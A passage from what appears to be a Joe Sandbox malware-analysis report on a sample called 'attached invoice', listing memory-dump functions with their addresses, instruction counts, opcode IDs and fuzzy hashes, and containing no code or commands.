                                                                                                    • Instruction Fuzzy Hash: DF119E3AA00605AFEB31DF68C844B56BBEDEB84B51F058469FA0D9B160E770DD41CBA0
                                                                                                    Function 0190270D Relevance: .1, Instructions: 58COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 0a20947b63bf36c2e91fff24854693aab5fa10cdd9ea62b68a1197a25b4eaa19
                                                                                                    • Instruction ID: 8b884b314758040645361ece9101e55d70f2739afd966ed0d9ff9ae8b0ee0237
                                                                                                    • Opcode Fuzzy Hash: 0a20947b63bf36c2e91fff24854693aab5fa10cdd9ea62b68a1197a25b4eaa19
                                                                                                    • Instruction Fuzzy Hash: 700104352842449FE326976EC888F2B6B8DEF80354F090465BA0E8B690DB14EC00C222
                                                                                                    Function 018E45B0 Relevance: .1, Instructions: 57COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ffaef4c0da400ada74ffca33d8ab7dba855c8e078faf3859abc6ae0384ff15bf
                                                                                                    • Instruction ID: 02fa0dff7e80e2fcf8b03daf1cf4b95e3220bfcb4035ddd653a1cfd02b59bad8
                                                                                                    • Opcode Fuzzy Hash: ffaef4c0da400ada74ffca33d8ab7dba855c8e078faf3859abc6ae0384ff15bf
                                                                                                    • Instruction Fuzzy Hash: 0611A072600284EFE721CF6DD988B567BE8EB96B64F004119F908CB6A1C374EA41CF64
                                                                                                    Function 01916540 Relevance: .1, Instructions: 56COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c13efcd730664010b8fb28ca60bb890413d3d08ff9a73cbcdbc78844ce48247a
                                                                                                    • Instruction ID: 3835828e5723e49e8eaeca6764e5a3af6c23c035074f9b71122962e130075f45
                                                                                                    • Opcode Fuzzy Hash: c13efcd730664010b8fb28ca60bb890413d3d08ff9a73cbcdbc78844ce48247a
                                                                                                    • Instruction Fuzzy Hash: 0B11C276D00719ABDB21DB5CC980B5EFBBCEF88741F510455DA05A7208D7B0EE40CBA0
                                                                                                    Function 0190E94E Relevance: .1, Instructions: 56COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b232d2abcec8129f34ff0a506025307645e2fec09e24289b375cce7154834ee3
                                                                                                    • Instruction ID: aa9a3b189418cf13d6a24979cf8717d898458572dbd08599e718ca29b5739218
                                                                                                    • Opcode Fuzzy Hash: b232d2abcec8129f34ff0a506025307645e2fec09e24289b375cce7154834ee3
                                                                                                    • Instruction Fuzzy Hash: 9501D2706052059FD326DB29D508F16BBF9EFC1325F25856AE1088B2A0C7B0DC82CB90
                                                                                                    Function 0190E45E Relevance: .1, Instructions: 55COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 455bce23832b52538749159921cc7050e51cacc56926870afb5c52b8d3feabff
                                                                                                    • Instruction ID: 52f56bf481dcd4f312d016d5fcf398c049fc40eec0855ae4902f1ca946c84f3f
                                                                                                    • Opcode Fuzzy Hash: 455bce23832b52538749159921cc7050e51cacc56926870afb5c52b8d3feabff
                                                                                                    • Instruction Fuzzy Hash: CE11A132605A928FE723871DC984F257BDCBB41B69F0B08A4DE09CB792D728D841C752
                                                                                                    Function 0196E3DD Relevance: .1, Instructions: 54COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1d78969a3de063c0e7614b86bbe96c2a5dc513fbd87671afc715f87d050cf35f
                                                                                                    • Instruction ID: dcf811fb584b086a1f703814b68ff499f343dc87a4b5e10f5a9d9025ae4bf1dc
                                                                                                    • Opcode Fuzzy Hash: 1d78969a3de063c0e7614b86bbe96c2a5dc513fbd87671afc715f87d050cf35f
                                                                                                    • Instruction Fuzzy Hash: 3401C036700201EFEB21DF28C804F5A7AADEF81B51F098025EA0C9B2A0E771DD41DBA1
                                                                                                    Function 018DA200 Relevance: .1, Instructions: 52COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d263eb727e6f94393b138218498dfa5cbc63c67a61b158300c6e1476aab7b55a
                                                                                                    • Instruction ID: a01b6fb6ef07ce02db953a1f40d35eafe63ea355347ca2a7f9c14f899f286958
                                                                                                    • Opcode Fuzzy Hash: d263eb727e6f94393b138218498dfa5cbc63c67a61b158300c6e1476aab7b55a
                                                                                                    • Instruction Fuzzy Hash: 4F0126324057259BCB358F1AD840A227BE4EF55770710892DFC95CB690C331D601CBA0
                                                                                                    Function 018E6179 Relevance: .1, Instructions: 51COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 7d79265acbb5a248e64c44832ea289083a32109e199662ac0ef59c2079592b41
                                                                                                    • Instruction ID: 61d7a5c4cca35c4f4f9cecb8dad5897beb6a4365a0e3a5c0ff97e17734f87b8f
                                                                                                    • Opcode Fuzzy Hash: 7d79265acbb5a248e64c44832ea289083a32109e199662ac0ef59c2079592b41
                                                                                                    • Instruction Fuzzy Hash: A8114871641229ABDB36EB24CC42FE972B4AB54710F5041E4A319E60E0DB30AE85CF85
                                                                                                    Function 018D6DA6 Relevance: .1, Instructions: 51COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b71d7968617b58e18b4f3a29a83093d72e5c52bbd5571b7be6c601315f292ea0
                                                                                                    • Instruction ID: fca11e2ebf7a1f1fa00bfe7d44b6cd9833862409cc776c14587eb064952deb6f
                                                                                                    • Opcode Fuzzy Hash: b71d7968617b58e18b4f3a29a83093d72e5c52bbd5571b7be6c601315f292ea0
                                                                                                    • Instruction Fuzzy Hash: 5D014131B04707ABDB106E299884A26B7F9FBE431AB440528FA4D87640CBA0EC45C7D0
                                                                                                    Function 01976090 Relevance: .0, Instructions: 50COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4a42c43c5b99f84c15717a4769500c6c0d75f297192a71c335de32c8c5e539cb
                                                                                                    • Instruction ID: 2961250a2cad7b147afc03c783a62ef0cabe9ac68d5738b86504e14b0d35c1a8
                                                                                                    • Opcode Fuzzy Hash: 4a42c43c5b99f84c15717a4769500c6c0d75f297192a71c335de32c8c5e539cb
                                                                                                    • Instruction Fuzzy Hash: 2711E1322045469FE711CF1DD800BA2BBB9FF8A304F088159E948CB312DB32E881CBA0
                                                                                                    Function 0196C490 Relevance: .0, Instructions: 50COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f0ea12de8012fc827d7573a50fbd03460fad6fa4bb550fb6da17a1c1734d1dd0
                                                                                                    • Instruction ID: 0688508e5a4dd4d2495dff4d1e4243621f36647f896e8e2cd65e58c3a6ed6326
                                                                                                    • Opcode Fuzzy Hash: f0ea12de8012fc827d7573a50fbd03460fad6fa4bb550fb6da17a1c1734d1dd0
                                                                                                    • Instruction Fuzzy Hash: A711FAB1A012599FCB04DFADD541AAEBBF8FF58700F10406AF915E7345D674EA01CBA4
                                                                                                    Function 01922010 Relevance: .0, Instructions: 49COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: dc1395c019e480b4a0911d2d995eb0aad683b68ca59e98ef09524196358e146e
                                                                                                    • Instruction ID: e2908cd6daf1a27a697fca8466270387106df3c0e1fb532c935dba9fba511f72
                                                                                                    • Opcode Fuzzy Hash: dc1395c019e480b4a0911d2d995eb0aad683b68ca59e98ef09524196358e146e
                                                                                                    • Instruction Fuzzy Hash: A5118031A01219EFDB15DF68C854FAE7BB9EB84704F0040A9FD15AB284DA35AE15CB90
                                                                                                    Function 01976550 Relevance: .0, Instructions: 49COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 33b162d05537b3c4a1091a8b5f104d68d6ffdd3743d6cff098977235b3a9d643
                                                                                                    • Instruction ID: f012678439eec9f3ee5a5ebfe7f8185a4a60a6ab86d057c86e6679bb9caa46ea
                                                                                                    • Opcode Fuzzy Hash: 33b162d05537b3c4a1091a8b5f104d68d6ffdd3743d6cff098977235b3a9d643
                                                                                                    • Instruction Fuzzy Hash: B701D4322156119BD720DF68C889A6ABBACEF99660F110629F92D87284E730A915C7D1
                                                                                                    Function 0191E4EF Relevance: .0, Instructions: 49COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9f43462253ea403222dd0f826f9fa77bf0d1a1947303075e0dce0566d396c8f4
                                                                                                    • Instruction ID: 387dbf70d4eeac5129490e4c4a9ead82cfc67a53a0f56074f8ebfd5af91419eb
                                                                                                    • Opcode Fuzzy Hash: 9f43462253ea403222dd0f826f9fa77bf0d1a1947303075e0dce0566d396c8f4
                                                                                                    • Instruction Fuzzy Hash: 8C01A2B1200A46BFD721AB7DCD80E57B7ACFFA4764B00062DBA09D3561DB64ED11C6E1
                                                                                                    Function 0196C0E0 Relevance: .0, Instructions: 48COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 944a09b508ace91c4177ddca2f8d3d219e3f3a5666084e898f120ddc34daca5e
                                                                                                    • Instruction ID: d49ef1084205d06c0ceca99092f990f2782676e63b5e6debd8f4770f43f66246
                                                                                                    • Opcode Fuzzy Hash: 944a09b508ace91c4177ddca2f8d3d219e3f3a5666084e898f120ddc34daca5e
                                                                                                    • Instruction Fuzzy Hash: DE115B71A01209EFDB15DF68C854EAEBBB9BB88304F014099FD4997340DA34EA11CBA0
                                                                                                    Function 0196C5FC Relevance: .0, Instructions: 48COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9ef746491054ba8c7799a52478f02bfcf8c7b542ee7ae7d2c007e9d399c51239
                                                                                                    • Instruction ID: 420c2ba3e870731f0ce757db0d985be87db717b549fd87fedfea59f20b73f863
                                                                                                    • Opcode Fuzzy Hash: 9ef746491054ba8c7799a52478f02bfcf8c7b542ee7ae7d2c007e9d399c51239
                                                                                                    • Instruction Fuzzy Hash: 7E115BB16093059FC700DF69D541A5BBBE8EF99710F00895EF998D7395E630E900CBA6
                                                                                                    Function 0196C691 Relevance: .0, Instructions: 48COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: beb0dde6ec043606db2645fe493f66bd050a040b31ca56f1e723c5a60e741770
                                                                                                    • Instruction ID: 847303cd47c712273ac5325de3c58b18b081d0eaca46876ff27483944ffa91ea
                                                                                                    • Opcode Fuzzy Hash: beb0dde6ec043606db2645fe493f66bd050a040b31ca56f1e723c5a60e741770
                                                                                                    • Instruction Fuzzy Hash: 941157B16093459FC710DF6DD441A5BBBE8EF99710F00895EFAA8D7394E630E900CBA6
                                                                                                    Function 019B4600 Relevance: .0, Instructions: 48COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: deabd88390078362f9191f43be5e77a801157fca1f27e4f3f2c8ea50d30b1bb8
                                                                                                    • Instruction ID: 2aee88412b19116641a39eb91e358785a584a565270fa1d312ba87f0b3eb492a
                                                                                                    • Opcode Fuzzy Hash: deabd88390078362f9191f43be5e77a801157fca1f27e4f3f2c8ea50d30b1bb8
                                                                                                    • Instruction Fuzzy Hash: 16014732200A01DFD721DAA9C980FD7B7EAFFC1200F044818EA1BCB651DA70F890D790
                                                                                                    Function 0191415F Relevance: .0, Instructions: 46COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 42b5e9f7c0c01f927600f39f4a277ea9f309fade3060a639a62bf7f63dc5f501
                                                                                                    • Instruction ID: 48db7047dae9aa5efef7381a058eb86c52b24827bdc0ecc6277100d5330d952a
                                                                                                    • Opcode Fuzzy Hash: 42b5e9f7c0c01f927600f39f4a277ea9f309fade3060a639a62bf7f63dc5f501
                                                                                                    • Instruction Fuzzy Hash: 57018F362042069BC325CF7D9618961BFECFBBD315718052AE90DD3B18D722F982C711
                                                                                                    Function 018D821B Relevance: .0, Instructions: 46COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 65c189f4a807d067ae84cb18f572c5a42a80582b2a2f0c233b44a1ac19711162
                                                                                                    • Instruction ID: a9acab5fa3f24b75750914341a06b342e3e9fdc823fd6dcd15fc47f7e82f9fcf
                                                                                                    • Opcode Fuzzy Hash: 65c189f4a807d067ae84cb18f572c5a42a80582b2a2f0c233b44a1ac19711162
                                                                                                    • Instruction Fuzzy Hash: 8D01F231700209DBCB14EFA9D9019AEB7ADBBC2710F154069DA06D3240DE20DE05C661
                                                                                                    Function 0196488F Relevance: .0, Instructions: 46COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e6b7b1f8f946c324fd417f7ef31f32d5cb77ddd1c6236be14f907f398348fdbe
                                                                                                    • Instruction ID: 5bcc73c882f4c130f962a2b72a8603d2aa15e73d663f6c2b0251c9e624665f6c
                                                                                                    • Opcode Fuzzy Hash: e6b7b1f8f946c324fd417f7ef31f32d5cb77ddd1c6236be14f907f398348fdbe
                                                                                                    • Instruction Fuzzy Hash: AC01D672B0130AAFEB219FDDD9C0B59BBFCAB94751F010069EA08D7202D7B4D940C7A1
                                                                                                    Function 018E24A2 Relevance: .0, Instructions: 45COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1057bc5d7e66742d5d726521e8916bc4596fe4ab03b57e93826d1f00386fd0dc
                                                                                                    • Instruction ID: 1bb1f946064fd914a0bd8b9a3e97171480a8c1b5ea1435924f0eae20f4078f57
                                                                                                    • Opcode Fuzzy Hash: 1057bc5d7e66742d5d726521e8916bc4596fe4ab03b57e93826d1f00386fd0dc
                                                                                                    • Instruction Fuzzy Hash: A0F0F432A41A61A7D731DF5A8C84F07BFFDEBC5B94F104029AA09D7240C620DE01D6A0
                                                                                                    Function 019B4AE8 Relevance: .0, Instructions: 45COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: aa7c6465218be75f858c072643bb4d3b90133c07f2c6c911862e3f2ee8ef0157
                                                                                                    • Instruction ID: 8ea3e8430a02813344f2bee6cc6e5b1b9bb0ade1ad296170294e6cac38b5f293
                                                                                                    • Opcode Fuzzy Hash: aa7c6465218be75f858c072643bb4d3b90133c07f2c6c911862e3f2ee8ef0157
                                                                                                    • Instruction Fuzzy Hash: 63014CB1A00219ABCB04DFA9D940ADEB7F8FF58304F10445AEA15E7341D774DA00CBA4
                                                                                                    Function 018DC2B0 Relevance: .0, Instructions: 43COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f9429900c64a47a2e9c2ca5d52e6d9bd748c69c7f3c99ecb53a8a2d053acaf1b
                                                                                                    • Instruction ID: 8550a14ae50cacf485ba47383a0470f0536cd81999423655fdc1895f793028b6
                                                                                                    • Opcode Fuzzy Hash: f9429900c64a47a2e9c2ca5d52e6d9bd748c69c7f3c99ecb53a8a2d053acaf1b
                                                                                                    • Instruction Fuzzy Hash: 9FF0C8732407279BD3325ADD8840B17A7999FD5B60F15003DE60DEB644CF608A01D7D5
                                                                                                    Function 019B4BE0 Relevance: .0, Instructions: 43COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ee03e2bc48b22585c9854def7e56971ea635b1913ea13d81684e2922530cf869
                                                                                                    • Instruction ID: f9faa0fd8cb165d4b65ea5cb423270c18508155197e3765ee4c3d4e64ad43746
                                                                                                    • Opcode Fuzzy Hash: ee03e2bc48b22585c9854def7e56971ea635b1913ea13d81684e2922530cf869
                                                                                                    • Instruction Fuzzy Hash: 59012CB1A01219AFCB04DFA9D981AEEBBF8EF58704F10445AF905E7341D674AA01CBA4
                                                                                                    Function 019B4B67 Relevance: .0, Instructions: 43COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 126e30a2350af7d187a313542347114adced9489bc4c85e3536e42c8b2664fda
                                                                                                    • Instruction ID: af58c65f3180d6b173c7963669bc04378e49bbc3f18570c4204f93dda2bbe4a1
                                                                                                    • Opcode Fuzzy Hash: 126e30a2350af7d187a313542347114adced9489bc4c85e3536e42c8b2664fda
                                                                                                    • Instruction Fuzzy Hash: 60012171A012199FDB00DFA9D981ADEBBF8EF58704F10445AFA05E7341D634DA018BA0
                                                                                                    Function 0191C98F Relevance: .0, Instructions: 42COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 8a49d7d89f33e5bf064cc7cc815dab5f191e9a4415fd639dc17ebe174072b9c1
                                                                                                    • Instruction ID: 2451209557bddbe58f225d50e681d2d9287ce31b18aadadd486d1893278ac024
                                                                                                    • Opcode Fuzzy Hash: 8a49d7d89f33e5bf064cc7cc815dab5f191e9a4415fd639dc17ebe174072b9c1
                                                                                                    • Instruction Fuzzy Hash: B301F931240984ABD322965EC804F65BFDDEF81790F0904A2FE0CDB2A1D675C840C311
                                                                                                    Function 01966040 Relevance: .0, Instructions: 41COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 0dd29ffe6cddaff40cdda75bcb1669297d52e5307dee62bf9dea0ffac2072810
                                                                                                    • Instruction ID: c336bd05870c2e27f70398e1630b159f3eeb1b2f3f2765ead94e36f05ab2508f
                                                                                                    • Opcode Fuzzy Hash: 0dd29ffe6cddaff40cdda75bcb1669297d52e5307dee62bf9dea0ffac2072810
                                                                                                    • Instruction Fuzzy Hash: 33F01D7220000DBFEF029F95DD80DAF7BBEEB592D8B114225BA1496160D731DE21ABA0
                                                                                                    Function 0196A130 Relevance: .0, Instructions: 40COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c58e7c3eb606c93894479ee14c9a14bef9ef07d3b5efc54528f8e3f6604b0f95
                                                                                                    • Instruction ID: b9188ea64fce9fad462aa48ac5afd3d78dbd8baef073a53be2d496799ae12576
                                                                                                    • Opcode Fuzzy Hash: c58e7c3eb606c93894479ee14c9a14bef9ef07d3b5efc54528f8e3f6604b0f95
                                                                                                    • Instruction Fuzzy Hash: 07019736101219EFDF129F84DC40EDA7F6AFB4C794F068102FE1866220C232D9B1EB90
                                                                                                    Function 018DC090 Relevance: .0, Instructions: 39COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.811738580273.00000000018B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018B0000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_18b0000_attached invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
